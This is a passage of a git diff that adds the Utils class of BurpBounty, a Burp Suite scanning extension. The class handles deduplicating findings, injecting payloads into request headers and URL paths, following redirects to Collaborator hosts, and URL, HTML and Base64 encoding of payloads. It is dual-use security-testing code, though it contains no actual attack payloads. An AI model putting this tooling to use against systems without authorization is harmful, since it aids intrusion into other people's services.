burp.IScanIssue; +import burp.IScannerInsertionPoint; +import com.google.gson.Gson; +import com.google.gson.JsonArray; +import java.net.MalformedURLException; +import java.net.URL; +import java.util.ArrayList; +import java.util.Arrays; +import java.util.List; + +/** + * + * @author wagiro + */ +public class Utils { + + private IBurpExtenderCallbacks callbacks; + private IExtensionHelpers helpers; + + JsonArray active_profiles; + BurpBountyExtension bbe; + Gson gson; + CollaboratorData burpCollaboratorData; + BurpBountyGui bbg; + JsonArray allprofiles; + Integer redirtype; + List rules_done = new ArrayList<>(); + Integer smartscandelay; + + public Utils(BurpBountyExtension bbe, IBurpExtenderCallbacks callbacks, CollaboratorData burpCollaboratorData, JsonArray allprofiles, BurpBountyGui bbg) { + + this.callbacks = callbacks; + helpers = callbacks.getHelpers(); + this.burpCollaboratorData = burpCollaboratorData; + gson = new Gson(); + this.allprofiles = allprofiles; + this.bbe = bbe; + this.bbg = bbg; + } + + public Boolean checkDuplicated(IHttpRequestResponse requestResponse, String issuename, IScannerInsertionPoint insertionPoint) { + IRequestInfo request = helpers.analyzeRequest(requestResponse); + String host = request.getUrl().getProtocol() + "://" + request.getUrl().getHost(); + IScanIssue[] issues = callbacks.getScanIssues(host); + Boolean duplicated = false; + + for (IScanIssue issue : issues) { + String path = issue.getUrl().getPath(); + String is = issue.getIssueName(); + if (is.equals("BurpBounty - " + issuename) && path.equals(request.getUrl().getPath())) { + String details = issue.getIssueDetail(); + if (details.contains("Vulnerable parameter")) { + String param = details.substring(details.indexOf(": ") + 2, details.indexOf(".")); + if (param.equals(insertionPoint.getInsertionPointName())) { + duplicated = true; + } +// String param = details.substring(details.indexOf(": ") + 2, details.indexOf(".")); +// String param2 = insertionPoint.getInsertionPointName()+"_"+String.valueOf(insertionPoint.getInsertionPointType()); +// //Revisar prque posa el param2 com a artist_0_65 y el param es artist +// if (param.equals(insertionPoint.getInsertionPointName()+"_"+String.valueOf(insertionPoint.getInsertionPointType()))) { +// duplicated = true; +// } + } + } + } + + if (duplicated) { + return true; + } else { + return false; + } + } + + public Boolean checkDuplicatedPassiveResponse(IHttpRequestResponse requestResponse, String issuename) { + IRequestInfo request = helpers.analyzeRequest(requestResponse); + String host = request.getUrl().getProtocol() + "://" + request.getUrl().getHost(); + IScanIssue[] issues = callbacks.getScanIssues(host); + Boolean duplicated = false; + + for (IScanIssue issue : issues) { + String path = issue.getUrl().getPath(); + String is = issue.getIssueName(); + if (is.equals("BurpBounty - " + issuename) && path.equals(request.getUrl().getPath())) { + duplicated = true; + } + } + + if (duplicated) { + return true; + } else { + return false; + } + } + + public Boolean checkDuplicatedPassive(IHttpRequestResponse requestResponse, String issuename) { + IRequestInfo request = helpers.analyzeRequest(requestResponse); + String host = request.getUrl().getProtocol() + "://" + request.getUrl().getHost(); + IScanIssue[] issues = callbacks.getScanIssues(host); + Boolean duplicated = false; + + for (IScanIssue issue : issues) { + String path = issue.getUrl().getPath(); + String is = issue.getIssueName(); + if (is.equals("BurpBounty - " + issuename) && path.equals(request.getUrl().getPath())) { + duplicated = true; + } + } + + if (duplicated) { + return true; + } else { + return false; + } + } + + public List getInsertionPoints(IHttpRequestResponse baseRequestResponse) { + List insertionPoints = new ArrayList(); + + try { + + if (baseRequestResponse == null || baseRequestResponse.getRequest() == null || baseRequestResponse.getResponse() == null) { + return insertionPoints; + } + IRequestInfo request = helpers.analyzeRequest(baseRequestResponse); + + byte[] req = baseRequestResponse.getRequest(); + if (request.getMethod().equals("GET")) { + String url = request.getUrl().getHost(); + byte[] match = helpers.stringToBytes("/"); + int len = helpers.bytesToString(baseRequestResponse.getRequest()).indexOf("HTTP"); + int beginAt = 0; + + List params = new ArrayList(); + while (beginAt < len) { + beginAt = helpers.indexOf(req, match, false, beginAt, len); + if (beginAt == -1) { + break; + } + if (!params.contains(url + ":p4r4m" + beginAt)) { + insertionPoints.add(helpers.makeScannerInsertionPoint("p4r4m" + beginAt + "_65", baseRequestResponse.getRequest(), beginAt, helpers.bytesToString(baseRequestResponse.getRequest()).indexOf(" HTTP"))); + params.add(url + ":p4r4m" + beginAt); + } + beginAt += match.length; + } + } + } catch (NullPointerException e) { + return null; + } + return insertionPoints; + } + + public boolean encode(IScannerInsertionPoint insertionPoint, boolean request) { + byte value = insertionPoint.getInsertionPointType(); + String value2 = insertionPoint.getInsertionPointName(); + if ((value == 0 || value == 34 || value == 33 || value == 37 || value == 65) && !request) { + return true; + } else if (value2.endsWith("_0") || value2.endsWith("_34") || value2.endsWith("_33") || value2.endsWith("_37") || value2.endsWith("_65")) { + return true; + } else { + return false; + } + } + + public URL getRedirection(IHttpRequestResponse response, IHttpService httpService, Integer redirtype) { + + try { + + URL url = getLocation(httpService, response); + + if (url.toString().contains("burpcollaborator.net")) { + return url; + } else if (redirtype == 2) { + if (url.getHost().contains(httpService.getHost())) { + return url; + } + } else if (redirtype == 3) { + boolean isurl = callbacks.isInScope(url); + if (isurl) { + return url; + } + } else if (redirtype == 4) { + return url; + } else { + return null; + } + + return null; + } catch (NullPointerException | ArrayIndexOutOfBoundsException ex) { + //Mirar esto genera muchos erroresSystem.out.println("Utils line 1207: " + ex.getMessage()); + return null; + } + } + + public URL getLocation(IHttpService httpService, IHttpRequestResponse response) { + String[] host = null; + String Location = ""; + URL url; + + try { + IResponseInfo response_info = helpers.analyzeResponse(response.getResponse()); + + for (String header : response_info.getHeaders()) { + if (header.toUpperCase().startsWith("LOCATION:")) { + host = header.split("\\s+"); + Location = host[1]; + break; + } + } + + if (Location.startsWith("http://") || Location.startsWith("https://")) { + url = new URL(Location); + return url; + } else if (Location.startsWith("/")) { + url = new URL(httpService.getProtocol() + "://" + httpService.getHost() + Location); + return url; + } else { + url = new URL(httpService.getProtocol() + "://" + httpService.getHost() + "/" + Location); + return url; + } + + } catch (MalformedURLException | NullPointerException | ArrayIndexOutOfBoundsException ex) { + System.out.println("Utils line 1237: " + ex.getMessage()); + return null; + } + } + + public byte[] getMatchAndReplace(List headers, byte[] checkRequest, String payload, String bchost) { + String tempRequest = helpers.bytesToString(checkRequest); + + if (!headers.isEmpty()) { + for (int x = 0; x < headers.size(); x++) { + String replace = headers.get(x).replace; + if (headers.get(x).type.equals("Request")) { + if (headers.get(x).regex.equals("String")) { + if (replace.contains("{PAYLOAD}")) { + replace = replace.replace("{PAYLOAD}", payload); + } + if (replace.contains("{BC}")) { + replace = replace.replace("{BC}", bchost); + } + if (headers.get(x).match.isEmpty()) { + tempRequest = tempRequest.replace("\r\n\r\n", "\r\n" + replace + "\r\n\r\n"); + } else { + tempRequest = tempRequest.replace(headers.get(x).match, replace); + } + } else { + if (replace.contains("{PAYLOAD}")) { + replace = replace.replaceAll("\\{PAYLOAD\\}", payload); + } + if (replace.contains("{BC}")) { + replace = replace.replaceAll("\\{BC\\}", bchost); + } + if (headers.get(x).match.isEmpty()) { + tempRequest = tempRequest.replaceAll("\\r\\n\\r\\n", "\r\n" + replace + "\r\n\r\n"); + } else { + tempRequest = tempRequest.replaceAll(headers.get(x).match, replace); + } + } + + } + } + } + return helpers.stringToBytes(tempRequest); + } + + public int getContentLength(IHttpRequestResponse response) { + IResponseInfo response_info; + try { + response_info = helpers.analyzeResponse(response.getResponse()); + } catch (NullPointerException ex) { + System.out.println("Utils line 1279: " + ex.getMessage()); + return 0; + } + + int ContentLength = 0; + + for (String headers : response_info.getHeaders()) { + if (headers.toUpperCase().startsWith("CONTENT-LENGTH:")) { + ContentLength = Integer.parseInt(headers.split("\\s+")[1]); + break; + } + } + return ContentLength; + } + + public boolean isResponseCode(String responsecodes, boolean negativerc, Integer responsecode) { + + if (responsecodes.isEmpty()) { + return false; + } + + List items = Arrays.asList(responsecodes.split("\\s*,\\s*")); + String code = Integer.toString(responsecode); + + if (items.contains(code)) { + if (!negativerc) { + return true; + } else { + return false; + } + } else { + if (negativerc) { + return true; + } else { + return false; + } + } + } + + public boolean isContentType(String contenttype, boolean negativect, IResponseInfo r) { + List HEADERS = r.getHeaders(); + + if (contenttype.isEmpty()) { + return false; + } + + List items = Arrays.asList(contenttype.toUpperCase().split("\\s*,\\s*")); + + for (String header : HEADERS) { + if (header.toUpperCase().startsWith("CONTENT-TYPE:")) { + String content_type = header.substring(header.lastIndexOf(":") + 2).split(";")[0].toUpperCase(); + if (items.contains(content_type)) { + if (negativect) { + return false; + } + break; + } else { + if (!negativect) { + return false; + } + } + } + } + return true; + } + + public List processPayload(List payloads, List encoders) { + List pay = new ArrayList(); + for (String payload : payloads) { + payload = payload.replace("true,", ""); + + for (String p : encoders) { + switch (p) { + case "URL-encode key characters": + payload = encodeKeyURL(payload); + break; + case "URL-encode all characters": + payload = encodeURL(payload); + break; + case "URL-encode all characters (Unicode)": + payload = encodeUnicodeURL(payload); + break; + case "HTML-encode key characters": + payload = encodeKeyHTML(payload); + break; + case "HTML-encode all characters": + payload = encodeHTML(payload); + break; + case "Base64-encode": + payload = helpers.base64Encode(payload); + default: + break; + } + } + pay.add(payload); + } + + return pay; + } + + public static String encodeURL(String s) { + StringBuffer out = new StringBuffer(); + for (int i = 0; i < s.length(); i++) { + char c = s.charAt(i); + out.append("%" + Integer.toHexString((int) c)); + } + return out.toString(); + } + + public static String encodeUnicodeURL(String s) { + StringBuffer out = new StringBuffer(); + for (int i = 0; i < s.length(); i++) { + char c = s.charAt(i); + out.append("%u00" + Integer.toHexString((int) c)); + } + return out.toString(); + } + + public static String encodeHTML(String s) { + StringBuffer out = new StringBuffer(); + for (int i = 0; i < s.length(); i++) { + char c = s.charAt(i); + out.append("&#x" + Integer.toHexString((int) c) + ";"); + } + return out.toString(); + } + + public static String encodeKeyHTML(String s) { + StringBuffer out = new StringBuffer(); + String key = "\\<\\(\\[\\\\\\^\\-\\=\\$\\!\\|\\]\\)\\?\\*\\+\\.\\>]\\&\\%\\:\\@ "; + for (int i = 0; i < s.length(); i++) { + char c = s.charAt(i); + if (key.contains(s.substring(i, i + 1))) { + out.append("&#x" + Integer.toHexString((int) c) + ";"); + } else { + out.append(c); + } + } + return out.toString(); + } + + public static String encodeKeyURL(String s) { + StringBuffer out = new StringBuffer(); + String key = "\\<\\(\\[\\\\\\^\\-\\=\\$\\!\\|\\]\\)\\?\\*\\+\\.\\>]\\&\\%\\:\\@ "; + for (int i = 0; i < s.length(); i++) { + char c = s.charAt(i); + if (key.contains(s.substring(i, i + 1))) { + out.append("%" + Integer.toHexString((int) c)); + } else { + out.append(c); + } + } + return out.toString(); + } + + public static String encodeTheseURL(String s, String characters) { + StringBuffer out = new StringBuffer(); + for (int i = 0; i < s.length(); i++) { + char c = s.charAt(i); + if (characters.indexOf(c) >= 0) { + out.append("%" + Integer.toHexString((int) c)); + } else { + out.append(c); + } + } + return out.toString(); + } + +} diff --git a/src/logo_free.png b/src/logo_free.png new file mode 100755 index 0000000..06a7569 Binary files /dev/null and b/src/logo_free.png differ